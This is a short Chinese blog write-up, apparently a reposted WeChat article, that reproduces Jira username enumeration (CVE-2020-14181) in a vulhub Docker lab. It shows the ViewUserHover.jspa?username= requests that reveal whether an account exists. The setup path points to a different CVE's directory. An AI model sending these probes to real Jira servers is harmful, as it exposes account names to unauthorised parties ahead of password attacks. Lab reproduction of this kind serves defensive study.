Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现

admin 2021年4月2日02:43:23评论410 views字数 523阅读1分44秒阅读模式

简介

 

Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

 

影响版本

 

Jira < 7.13.6  Jira 8.0.0 - 8.5.7  Jira 8.6.0 - 8.12.0

 

环境搭建

 

这里使用docker进行搭建

https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581


进入目录并启动环境

cd vulhub-master/jira/CVE-2019-11581/docker-compose up -d


 

Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现


访问your-ip:8080即可看到页面

 

Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现


 

漏洞复现

 

访问http://192.168.1.102:8080/secure/ViewUserHover.jspa?username=user发现不存在用户

 

Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现


访问http://192.168.1.102:8080/secure/ViewUserHover.jspa?username=root发现存在root用户

 

Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现


 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日02:43:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jira 未经身份验证用户名枚举漏洞(CVE-2020-14181)复现https://cn-sec.com/archives/315446.html

发表评论

匿名网友 填写信息